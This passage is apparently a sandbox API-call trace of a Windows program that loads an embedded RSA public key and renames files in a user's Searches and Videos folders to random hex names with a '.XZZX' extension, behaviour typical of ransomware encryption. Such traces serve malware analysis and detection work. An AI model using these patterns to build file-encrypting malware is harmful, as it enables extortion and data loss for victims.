LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.757] lstrcpyW (in: lpString1=0x2baf460, lpString2="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" | out: lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" [0252.757] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.757] SetErrorMode (uMode=0x1) returned 0x1 [0252.757] lstrcpyW (in: lpString1=0x2baf860, lpString2="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" | out: lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" [0252.757] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x59bd2806, Data2=0xd47a, Data3=0x4ea0, Data4=([0]=0x9b, [1]=0x57, [2]=0xe6, [3]=0x17, [4]=0xab, [5]=0xb4, [6]=0x57, [7]=0x1b))) returned 0x0 [0252.757] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned 80 [0252.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0252.758] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\694A0ADC4141F84059BD280643FCDC88.XZZX") returned 80 [0252.758] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1029 os_tid = 0x1324 [0252.920] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.920] lstrcpyW (in: lpString1=0x2baf460, lpString2="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" | out: lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" [0252.920] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0252.921] SetErrorMode (uMode=0x1) returned 0x1 [0252.921] lstrcpyW (in: lpString1=0x2baf860, lpString2="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" | out: lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" [0252.921] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x45eb55ba, Data2=0xfc45, Data3=0x4e04, Data4=([0]=0xbe, [1]=0x1, [2]=0x7f, [3]=0xb5, [4]=0xf4, [5]=0x24, [6]=0xc5, [7]=0x49))) returned 0x0 [0252.921] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned 78 [0252.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0252.921] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\80D133224CE0F71445EB55BA4F9BDB5C.XZZX") returned 78 [0252.921] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1030 os_tid = 0x1328 [0253.071] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.071] lstrcpyW (in: lpString1=0x2baf460, lpString2="23B23FF43A95B5A94696D7543EB699F1.XZZX" | out: lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX") returned="23B23FF43A95B5A94696D7543EB699F1.XZZX" [0253.071] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.071] SetErrorMode (uMode=0x1) returned 0x1 [0253.071] lstrcpyW (in: lpString1=0x2baf860, lpString2="23B23FF43A95B5A94696D7543EB699F1.XZZX" | out: lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX") returned="23B23FF43A95B5A94696D7543EB699F1.XZZX" [0253.071] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xde043c92, Data2=0xd6d2, Data3=0x43b2, Data4=([0]=0xa3, [1]=0xe7, [2]=0xfd, [3]=0x15, [4]=0xe7, [5]=0x96, [6]=0x2b, [7]=0x71))) returned 0x0 [0253.071] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\23B23FF43A95B5A94696D7543EB699F1.XZZX") returned 78 [0253.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0253.072] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AA1BBBC438CE5404DE043C923B89384C.XZZX") returned 78 [0253.072] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1031 os_tid = 0x132c [0253.225] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.225] lstrcpyW (in: lpString1=0x2baf460, lpString2="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" | out: lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" [0253.225] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.225] SetErrorMode (uMode=0x1) returned 0x1 [0253.225] lstrcpyW (in: lpString1=0x2baf860, lpString2="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" | out: lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" [0253.226] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x1dd96906, Data2=0x647f, Data3=0x4b74, Data4=([0]=0x95, [1]=0xf0, [2]=0xc, [3]=0x6a, [4]=0x6c, [5]=0x36, [6]=0xea, [7]=0x64))) returned 0x0 [0253.226] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned 78 [0253.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0253.226] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BBE171FA1D9EBE8C1DD969062059A2D4.XZZX") returned 78 [0253.226] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1032 os_tid = 0x1330 [0253.381] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.381] lstrcpyW (in: lpString1=0x2baf460, lpString2="D0384500388B9600F42B1AE33CC07A48.XZZX" | out: lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX") returned="D0384500388B9600F42B1AE33CC07A48.XZZX" [0253.381] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.381] SetErrorMode (uMode=0x1) returned 0x1 [0253.381] lstrcpyW (in: lpString1=0x2baf860, lpString2="D0384500388B9600F42B1AE33CC07A48.XZZX" | out: lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX") returned="D0384500388B9600F42B1AE33CC07A48.XZZX" [0253.381] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xe610d0d0, Data2=0x2917, Data3=0x4759, Data4=([0]=0xa2, [1]=0x57, [2]=0xa6, [3]=0xfa, [4]=0xa1, [5]=0x93, [6]=0xfd, [7]=0xe))) returned 0x0 [0253.381] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D0384500388B9600F42B1AE33CC07A48.XZZX") returned 78 [0253.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0253.382] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5CF412B00B73A9FFE610D0D00E2E8E47.XZZX") returned 78 [0253.382] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1033 os_tid = 0x1334 [0253.538] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.538] lstrcpyW (in: lpString1=0x2baf460, lpString2="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" | out: lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" [0253.538] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.538] SetErrorMode (uMode=0x1) returned 0x1 [0253.538] lstrcpyW (in: lpString1=0x2baf860, lpString2="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" | out: lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" [0253.538] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x7a90918c, Data2=0xddd3, Data3=0x41dc, Data4=([0]=0xbf, [1]=0xb, [2]=0xd3, [3]=0xe0, [4]=0xe9, [5]=0xa4, [6]=0xf5, [7]=0x2d))) returned 0x0 [0253.538] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned 78 [0253.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0253.538] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D2CDD264391134547A90918C3BCC189C.XZZX") returned 78 [0253.538] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1034 os_tid = 0x1338 [0253.696] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.696] lstrcpyW (in: lpString1=0x2baf460, lpString2="F12649BC389976C6163CED043CCE5B0E.XZZX" | out: lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX") returned="F12649BC389976C6163CED043CCE5B0E.XZZX" [0253.696] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.696] SetErrorMode (uMode=0x1) returned 0x1 [0253.696] lstrcpyW (in: lpString1=0x2baf860, lpString2="F12649BC389976C6163CED043CCE5B0E.XZZX" | out: lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX") returned="F12649BC389976C6163CED043CCE5B0E.XZZX" [0253.696] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x7b6a56c9, Data2=0xc6d3, Data3=0x4915, Data4=([0]=0x8c, [1]=0x88, [2]=0xc8, [3]=0x7, [4]=0xb4, [5]=0x2d, [6]=0x5f, [7]=0xfd))) returned 0x0 [0253.696] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F12649BC389976C6163CED043CCE5B0E.XZZX") returned 78 [0253.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0253.696] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F7C4FDAB38C27A4F7B6A56C93B7D5E97.XZZX") returned 78 [0253.696] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1035 os_tid = 0x133c [0253.851] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.851] lstrcpyW (in: lpString1=0x2baf460, lpString2="02D7186C2A67434F1071035C2E882797.XZZX" | out: lpString1="02D7186C2A67434F1071035C2E882797.XZZX") returned="02D7186C2A67434F1071035C2E882797.XZZX" [0253.851] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0253.851] SetErrorMode (uMode=0x1) returned 0x1 [0253.851] lstrcpyW (in: lpString1=0x2baf860, lpString2="02D7186C2A67434F1071035C2E882797.XZZX" | out: lpString1="02D7186C2A67434F1071035C2E882797.XZZX") returned="02D7186C2A67434F1071035C2E882797.XZZX" [0253.851] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x7bf588c3, Data2=0x4623, Data3=0x4238, Data4=([0]=0xa9, [1]=0xa1, [2]=0x20, [3]=0x42, [4]=0xc2, [5]=0xe8, [6]=0x86, [7]=0x25))) returned 0x0 [0253.851] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\02D7186C2A67434F1071035C2E882797.XZZX") returned 96 [0253.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0253.851] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\15F704A912245DA87BF588C314DF41F0.XZZX") returned 96 [0253.851] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1036 os_tid = 0x1340 [0254.005] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 